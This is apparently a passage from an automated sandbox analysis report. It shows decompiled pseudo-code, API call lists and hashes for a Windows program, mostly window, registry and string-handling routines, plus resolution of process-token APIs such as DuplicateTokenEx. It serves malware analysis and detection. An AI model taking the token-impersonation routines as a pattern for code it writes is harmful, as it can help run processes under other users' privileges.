                                                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                      • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                      • API String ID: 2238633743-1970996977
                                                                                      • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                      • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                      • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 39%
                                                                                      			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                      0x004045c2
                                                                                      0x004045d1
                                                                                      0x004045da
                                                                                      0x004045ef
                                                                                      0x004045f6
                                                                                      0x00404604
                                                                                      0x0040460b
                                                                                      0x00404610
                                                                                      0x00404616
                                                                                      0x00404617
                                                                                      0x00404618
                                                                                      0x00404628
                                                                                      0x00404629
                                                                                      0x0040462a
                                                                                      0x0040462f
                                                                                      0x00404630
                                                                                      0x00404631
                                                                                      0x0040463c
                                                                                      0x0040463d
                                                                                      0x0040463e
                                                                                      0x00404656
                                                                                      0x00404662
                                                                                      0x0040466b
                                                                                      0x0040466d
                                                                                      0x0040466e
                                                                                      0x00404674
                                                                                      0x00404679

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Delete_snwprintfmemset$Close
                                                                                      • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                      • API String ID: 1018939227-3575174989
                                                                                      • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                      • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                      • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 58%
                                                                                      			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                      0x0040314a
                                                                                      0x00403151
                                                                                      0x00403158
                                                                                      0x0040315a
                                                                                      0x00403162
                                                                                      0x00403166
                                                                                      0x00403190
                                                                                      0x00403190
                                                                                      0x00403198
                                                                                      0x00403199
                                                                                      0x0040319e
                                                                                      0x004031bb
                                                                                      0x004031a0
                                                                                      0x004031ad
                                                                                      0x004031b6
                                                                                      0x004031b6
                                                                                      0x0040319e
                                                                                      0x0040316e
                                                                                      0x00403176
                                                                                      0x0040317c
                                                                                      0x0040317f
                                                                                      0x0040317f
                                                                                      0x00403182
                                                                                      0x0040318a
                                                                                      0x00000000
                                                                                      0x0040318c
                                                                                      0x0040318c
                                                                                      0x00000000
                                                                                      0x0040318c

                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                      • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                      • API String ID: 2780580303-317687271
                                                                                      • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                      • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                      • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                      0x00404da9
                                                                                      0x00404dbc
                                                                                      0x00404dbf
                                                                                      0x00404dc6
                                                                                      0x00404dcc
                                                                                      0x00404dce
                                                                                      0x00404de1
                                                                                      0x00404deb
                                                                                      0x00404df2
                                                                                      0x00404df4
                                                                                      0x00404df4
                                                                                      0x00404e07
                                                                                      0x00404e0d
                                                                                      0x00404e18
                                                                                      0x00404e1c
                                                                                      0x00404e1e
                                                                                      0x00404e27
                                                                                      0x00404e28
                                                                                      0x00404e29
                                                                                      0x00404e2f
                                                                                      0x00404e31
                                                                                      0x00404e37
                                                                                      0x00404e41
                                                                                      0x00404e42
                                                                                      0x00404e43
                                                                                      0x00404e46
                                                                                      0x00404e46
                                                                                      0x00404e1c
                                                                                      0x00404e4d
                                                                                      0x00404e50
                                                                                      0x00404e5f
                                                                                      0x00404e66
                                                                                      0x00404e52
                                                                                      0x00404e52
                                                                                      0x00404e52
                                                                                      0x00404e6d
                                                                                      0x00404e70
                                                                                      0x00404e85
                                                                                      0x00404e85
                                                                                      0x00000000
                                                                                      0x00404e72
                                                                                      0x00404e7b
                                                                                      0x00404e80
                                                                                      0x00404e83
                                                                                      0x00404e87
                                                                                      0x00404e89
                                                                                      0x00404e8b
                                                                                      0x00404e8b
                                                                                      0x00404ea8
                                                                                      0x00404ea8
                                                                                      0x00000000
                                                                                      0x00404e83

                                                                                      APIs
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                      • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                      • GetDC.USER32(00000000), ref: 00404DD5
                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                      • ReleaseDC.USER32 ref: 00404DF4
                                                                                      • GetWindowRect.USER32 ref: 00404E07
                                                                                      • GetParent.USER32(?), ref: 00404E12
                                                                                      • GetWindowRect.USER32 ref: 00404E2F
                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                      • String ID:
                                                                                      • API String ID: 2163313125-0
                                                                                      • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                      • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                      • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 88%
                                                                                      			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                      0x0040639c
                                                                                      0x004063a4
                                                                                      0x004063b2
                                                                                      0x004063c2
                                                                                      0x004063d3
                                                                                      0x004063dc
                                                                                      0x004063eb
                                                                                      0x004063f0
                                                                                      0x00406401
                                                                                      0x00000000
                                                                                      0x0040641e
                                                                                      0x0040641f

                                                                                      APIs
                                                                                        • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                      • wcscpy.MSVCRT ref: 004063B2
                                                                                      • wcscpy.MSVCRT ref: 004063C2
                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                        • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                      • API String ID: 3176057301-2039793938
                                                                                      • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                      • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                      • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 16%
                                                                                      			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                      0x0040adf6
                                                                                      0x0040adf8
                                                                                      0x0040adfa
                                                                                      0x0040adfb
                                                                                      0x0040adfb
                                                                                      0x0040ae02
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040ae04
                                                                                      0x0040ae05
                                                                                      0x0040ae6d
                                                                                      0x0040ae6e
                                                                                      0x0040ae73
                                                                                      0x0040ae76
                                                                                      0x0040ae7f
                                                                                      0x0040ae83
                                                                                      0x0040ae86
                                                                                      0x00000000
                                                                                      0x0040ae86
                                                                                      0x0040ae8f
                                                                                      0x0040ae0c
                                                                                      0x0040ae10
                                                                                      0x0040ae1e
                                                                                      0x0040ae3b
                                                                                      0x0040ae4a
                                                                                      0x0040ae65
                                                                                      0x0040ae7a
                                                                                      0x0040ae7e
                                                                                      0x0040ae67
                                                                                      0x0040ae67
                                                                                      0x0040ae68
                                                                                      0x00000000
                                                                                      0x0040ae68
                                                                                      0x0040ae4c
                                                                                      0x0040ae4c
                                                                                      0x0040ae4e
                                                                                      0x00000000
                                                                                      0x0040ae4e
                                                                                      0x0040ae3d
                                                                                      0x0040ae3d
                                                                                      0x0040ae3f
                                                                                      0x0040ae53
                                                                                      0x0040ae54
                                                                                      0x0040ae59
                                                                                      0x0040ae5c
                                                                                      0x0040ae5c
                                                                                      0x0040ae20
                                                                                      0x0040ae28
                                                                                      0x0040ae2d
                                                                                      0x0040ae30
                                                                                      0x0040ae30
                                                                                      0x0040ae12
                                                                                      0x0040ae12
                                                                                      0x0040ae13
                                                                                      0x00000000
                                                                                      0x0040ae13
                                                                                      0x00000000
                                                                                      0x0040ae10

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                      • API String ID: 3510742995-3273207271
                                                                                      • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                      • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                      • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                      • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
				if(_a4 == 0x233) {
					_v536 = 0;
					memset( &_v534, 0, 0x208);
					DragQueryFileW(_a8, 0,  &_v536, 0x104);
					DragFinish(_a8);
					 *((intOrPtr*)( *_t95 + 4))(0);
					E00404923(0x104, _t95 + 0x1680,  &_v536);
					 *((intOrPtr*)( *_v12 + 4))(1);
					_t95 = _v12;
				}
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t42 = _a12;
							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
						}
					} else {
						E00402EC8(_t95 + 0x40);
					}
				} else {
					_v8 = BeginDeferWindowPos(0xd);
					_t96 = _t95 + 0x40;
					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t96 + 0x10), _t96, 1);
					_t95 = _v12;
				}
				return E00402CED(_t95, _a4, _a8, _a12);
			}












                                                                                      0x004041f9
                                                                                      0x00404205
                                                                                      0x00404208
                                                                                      0x00404217
                                                                                      0x0040421e
                                                                                      0x00404236
                                                                                      0x0040423f
                                                                                      0x0040424a
                                                                                      0x0040425f
                                                                                      0x0040426b
                                                                                      0x0040426e
                                                                                      0x0040426e
                                                                                      0x00404275
                                                                                      0x004043be
                                                                                      0x004043ce
                                                                                      0x004043d0
                                                                                      0x004043d3
                                                                                      0x004043da
                                                                                      0x004043da
                                                                                      0x004043c0
                                                                                      0x004043c3
                                                                                      0x004043c3
                                                                                      0x0040427b
                                                                                      0x0040428c
                                                                                      0x0040428f
                                                                                      0x00404295
                                                                                      0x004042a5
                                                                                      0x004042b8
                                                                                      0x004042cb
                                                                                      0x004042de
                                                                                      0x004042f1
                                                                                      0x00404304
                                                                                      0x00404317
                                                                                      0x0040432a
                                                                                      0x0040433d
                                                                                      0x00404350
                                                                                      0x00404363
                                                                                      0x00404376
                                                                                      0x00404389
                                                                                      0x0040439c
                                                                                      0x004043a4
                                                                                      0x004043af
                                                                                      0x004043b5
                                                                                      0x004043b5
                                                                                      0x004043f5

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040421E
                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                      • DragFinish.SHELL32(?), ref: 0040423F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                        • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                        • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                      • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                      • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                      • String ID: $
                                                                                      • API String ID: 2142561256-3993045852
                                                                                      • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                      • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                      • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                      • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405B81, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 55%
                                                                                      			E00405B81(signed short __ebx) {
				signed int _t21;
				void* _t22;
				struct HINSTANCE__* _t25;
				signed int _t27;
				void* _t35;
				signed short _t39;
				signed int _t40;
				void* _t57;
				int _t61;
				void* _t62;
				int _t71;

				_t39 = __ebx;
				if( *0x41c470 == 0) {
					E00405ADF();
				}
				_t40 =  *0x41c468;
				_t21 = 0;
				if(_t40 <= 0) {
					L5:
					_t57 = 0;
				} else {
					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
						_t21 = _t21 + 1;
						if(_t21 < _t40) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
				}
				L6:
				if(_t57 != 0) {
					L21:
					_t22 = _t57;
				} else {
					if((_t39 & 0x00010000) == 0) {
						if( *0x40fb90 == 0) {
							_push( *0x41c478 - 1);
							_push( *0x41c45c);
							_push(_t39);
							_t25 = E00405CE7();
							goto L15;
						} else {
							wcscpy(0x40fda0, L"strings");
							_t35 = E00405EDD(_t39,  *0x41c45c);
							_t62 = _t62 + 0x10;
							if(_t35 == 0) {
								L13:
								_t25 = GetModuleHandleW(0);
								_push( *0x41c478 - 1);
								_push( *0x41c45c);
								_push(_t39);
								goto L15;
							} else {
								_t61 = wcslen( *0x41c45c);
								if(_t61 == 0) {
									goto L13;
								}
							}
						}
					} else {
						_t25 = GetModuleHandleW(_t57);
						_push( *0x41c478 - 1);
						_push( *0x41c45c);
						_push(_t39 & 0x0000ffff);
						L15:
						_t61 = LoadStringW(_t25, ??, ??, ??);
						_t71 = _t61;
					}
					if(_t71 <= 0) {
						L20:
						_t22 = 0x40c4e8;
					} else {
						_t27 =  *0x41c46c;
						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
							goto L20;
						} else {
							_t57 =  *0x41c458 + _t27 * 2;
							_t14 = _t61 + 2; // 0x2
							memcpy(_t57,  *0x41c45c, _t61 + _t14);
							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
							 *0x41c468 =  *0x41c468 + 1;
							 *0x41c46c =  *0x41c46c + _t61 + 1;
							if(_t57 != 0) {
								goto L21;
							} else {
								goto L20;
							}
						}
					}
				}
				return _t22;
			}














                                                                                      0x00405b81
                                                                                      0x00405b88
                                                                                      0x00405b8a
                                                                                      0x00405b8a
                                                                                      0x00405b8f
                                                                                      0x00405b96
                                                                                      0x00405b9b
                                                                                      0x00405bad
                                                                                      0x00405bad
                                                                                      0x00405b9d
                                                                                      0x00405b9d
                                                                                      0x00405ba8
                                                                                      0x00405bab
